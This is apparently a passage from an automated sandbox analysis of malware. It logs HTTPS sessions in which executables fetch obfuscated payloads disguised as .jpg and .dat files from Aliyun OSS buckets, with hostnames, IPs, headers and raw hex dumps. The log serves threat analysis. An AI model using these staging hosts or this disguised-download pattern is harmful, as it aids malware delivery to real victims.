JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-13 01:06:50 UTC	4096	IN	Data Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed Data Ascii: <EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-13 01:06:50 UTC	159	IN	Data Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 8b 94 fa cc Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49992	47.101.28.195	443	3548	C:\Users\user\Desktop\13478674376-78423498.01.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:06:51 UTC	107	OUT	GET /s.jpg HTTP/1.1 User-Agent: 3M Host: hdsuer.oss-cn-shanghai.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:06:51 UTC	544	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:06:51 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 6784672B25017F393702B11D Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Sun, 12 Jan 2025 11:34:48 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000103 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 10
2025-01-13 01:06:51 UTC	3552	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 01:06:51 UTC	4096	IN	Data Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-13 01:06:51 UTC	651	IN	Data Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49993	118.178.60.9	443	1524	C:\Users\user\Documents\4mPVjj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:07:06 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:07:07 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:07:06 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 6784673A7CF8423434C76FB4 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 3
2025-01-13 01:07:07 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-13 01:07:07 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-13 01:07:07 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49994	118.178.60.9	443	1524	C:\Users\user\Documents\4mPVjj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:07:09 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 01:07:10 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 01:07:09 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 6784673DA7BABC3539C8F48A Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 1
2025-01-13 01:07:10 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49995	118.178.60.9	443	1524	C:\Users\user\Documents\4mPVjj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 01:07:11 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
